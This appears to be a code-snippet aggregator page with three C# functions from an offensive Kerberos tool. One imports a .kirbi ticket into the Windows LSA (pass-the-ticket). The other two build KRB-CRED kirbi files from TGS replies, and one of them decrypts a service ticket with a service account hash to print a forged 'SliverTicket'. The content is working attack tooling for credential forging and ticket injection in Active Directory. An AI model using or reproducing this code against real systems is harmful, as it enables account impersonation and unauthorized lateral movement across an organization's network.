Exemple #1
0
 public static void PTT(string ticket)
 {
     Console.WriteLine("[*] Importing Ticket...");
     if (Utils.Utils.IsBase64String(ticket))
     {
         var kirbiBytes = Convert.FromBase64String(ticket);
         PrintFunc.PrintKirbi(ticket);
         LSA.ImportTicket(kirbiBytes, new LUID());
         Environment.Exit(0);
     }
     else if (File.Exists(ticket))
     {
         byte[] kirbiBytes = File.ReadAllBytes(ticket);
         PrintFunc.PrintKirbi(Convert.ToBase64String(kirbiBytes));
         LSA.ImportTicket(kirbiBytes, new LUID());
         Environment.Exit(0);
     }
     else
     {
         Console.WriteLine("\r\n[x]Ticket must either be a .kirbi file or a base64 encoded .kirbi\r\n");
         Environment.Exit(0);
     }
 }
Exemple #2
0
        //FROM TGS_REP
        public static byte[] toKirbi(KrbTgsRep tgsRep, KrbEncTgsRepPart tgsDecryptedRepPart, bool ptt = false)
        {
            //KrbCredInfo::= SEQUENCE {
            //                key[0]                 EncryptionKey,
            //prealm[1]              Realm OPTIONAL,
            //pname[2]               PrincipalName OPTIONAL,
            //flags[3]               TicketFlags OPTIONAL,
            //authtime[4]            KerberosTime OPTIONAL,
            //starttime[5]           KerberosTime OPTIONAL,
            //endtime[6]             KerberosTime OPTIONAL
            //renew - till[7]          KerberosTime OPTIONAL,
            //srealm[8]              Realm OPTIONAL,
            //sname[9]               PrincipalName OPTIONAL,
            //caddr[10]              HostAddresses OPTIONAL
            //}

            var info = new KrbCredInfo()
            {
                Key       = tgsDecryptedRepPart.Key,
                Realm     = tgsDecryptedRepPart.Realm,
                PName     = tgsRep.CName,
                Flags     = tgsDecryptedRepPart.Flags,
                StartTime = tgsDecryptedRepPart.StartTime,
                EndTime   = tgsDecryptedRepPart.EndTime,
                RenewTill = tgsDecryptedRepPart.RenewTill,
                SRealm    = tgsDecryptedRepPart.Realm,
                SName     = tgsDecryptedRepPart.SName
            };



            //EncKrbCredPart   ::= [APPLICATION 29]   SEQUENCE {
            //ticket-info[0]         SEQUENCE OF KrbCredInfo,
            //nonce[1]               INTEGER OPTIONAL,
            //timestamp[2]           KerberosTime OPTIONAL,
            //usec[3]                INTEGER OPTIONAL,
            //s-address[4]           HostAddress OPTIONAL,
            //r-address[5]           HostAddress OPTIONAL
            //}

            KrbCredInfo[] infos = { info };

            var encCredPart = new KrbEncKrbCredPart()
            {
                TicketInfo = infos
            };

            //KRB-CRED         ::= [APPLICATION 22]   SEQUENCE {
            //pvno[0]                INTEGER,
            //msg - type[1]            INTEGER, --KRB_CRED
            //tickets[2]             SEQUENCE OF Ticket,
            //enc - part[3]            EncryptedData
            //}
            var myCred = new KrbCred();

            myCred.ProtocolVersionNumber = 5;
            myCred.MessageType           = MessageType.KRB_CRED;
            KrbTicket[] tickets = { tgsRep.Ticket };
            myCred.Tickets = tickets;


            var encryptedData = new KrbEncryptedData()
            {
                Cipher = encCredPart.EncodeApplication(),
            };

            myCred.EncryptedPart = encryptedData;

            byte[] kirbiBytes = myCred.EncodeApplication().ToArray();


            string kirbiString = Convert.ToBase64String(kirbiBytes);

            if (ptt)
            {
                LSA.ImportTicket(kirbiBytes, new LUID());
            }


            return(kirbiBytes);
        }
Exemple #3
0
        //FROM TGS
        public static byte[] toKirbi(KrbTicket tgs, string srvName, string srvHash, EncryptionType etype, string service, bool ptt = false, bool verbose = false)
        {
            var kerbCred = new Utils.KerberosHashCreds(srvName, srvHash, etype);

            var ticketDecrypted = tgs.EncryptedPart.Decrypt
                                      (kerbCred.CreateKey(),
                                      KeyUsage.Ticket,
                                      b => KrbEncTicketPart.DecodeApplication(b));


            //KrbCredInfo::= SEQUENCE {
            //                key[0]                 EncryptionKey,
            //prealm[1]              Realm OPTIONAL,
            //pname[2]               PrincipalName OPTIONAL,
            //flags[3]               TicketFlags OPTIONAL,
            //authtime[4]            KerberosTime OPTIONAL,
            //starttime[5]           KerberosTime OPTIONAL,
            //endtime[6]             KerberosTime OPTIONAL
            //renew - till[7]          KerberosTime OPTIONAL,
            //srealm[8]              Realm OPTIONAL,
            //sname[9]               PrincipalName OPTIONAL,
            //caddr[10]              HostAddresses OPTIONAL
            //}

            string srvHost = null;

            if (srvName.Contains("$"))
            {
                srvHost = srvName.Replace("$", string.Empty) + "." + ticketDecrypted.CRealm;
            }
            else
            {
                srvHost = srvName;
            }

            var info = new KrbCredInfo()
            {
                Key       = ticketDecrypted.Key,
                Realm     = ticketDecrypted.CRealm,
                PName     = ticketDecrypted.CName,
                Flags     = ticketDecrypted.Flags,
                StartTime = ticketDecrypted.StartTime,
                EndTime   = ticketDecrypted.EndTime,
                RenewTill = ticketDecrypted.RenewTill,
                SRealm    = ticketDecrypted.CRealm,
                SName     = new KrbPrincipalName()
                {
                    Type = PrincipalNameType.NT_SRV_INST,
                    Name = new[] { service, srvHost }
                }
            };



            //EncKrbCredPart   ::= [APPLICATION 29]   SEQUENCE {
            //ticket-info[0]         SEQUENCE OF KrbCredInfo,
            //nonce[1]               INTEGER OPTIONAL,
            //timestamp[2]           KerberosTime OPTIONAL,
            //usec[3]                INTEGER OPTIONAL,
            //s-address[4]           HostAddress OPTIONAL,
            //r-address[5]           HostAddress OPTIONAL
            //}

            KrbCredInfo[] infos = { info };

            var encCredPart = new KrbEncKrbCredPart()
            {
                TicketInfo = infos
            };

            //KRB-CRED         ::= [APPLICATION 22]   SEQUENCE {
            //pvno[0]                INTEGER,
            //msg - type[1]            INTEGER, --KRB_CRED
            //tickets[2]             SEQUENCE OF Ticket,
            //enc - part[3]            EncryptedData
            //}
            var myCred = new KrbCred();

            myCred.ProtocolVersionNumber = 5;
            myCred.MessageType           = MessageType.KRB_CRED;
            KrbTicket[] tickets = { tgs };
            myCred.Tickets = tickets;


            //https://github.com/dirkjanm/krbrelayx/blob/master/lib/utils/kerberos.py#L220
            //No Encryption for KRB-CRED
            var encryptedData = new KrbEncryptedData()
            {
                Cipher = encCredPart.EncodeApplication()
            };

            myCred.EncryptedPart = encryptedData;

            byte[] kirbiBytes = myCred.EncodeApplication().ToArray();


            string kirbiString = Convert.ToBase64String(kirbiBytes);

            if (ptt)
            {
                LSA.ImportTicket(kirbiBytes, new LUID());
            }
            else
            {
                Console.WriteLine("[+] SliverTicket Ticket Kirbi:");
                Console.WriteLine("    - {0}", kirbiString);
            }
            if (verbose)
            {
                Console.WriteLine("[*] Ticket Info:");
                PrintFunc.PrintKirbi(kirbiString);
            }


            return(kirbiBytes);
        }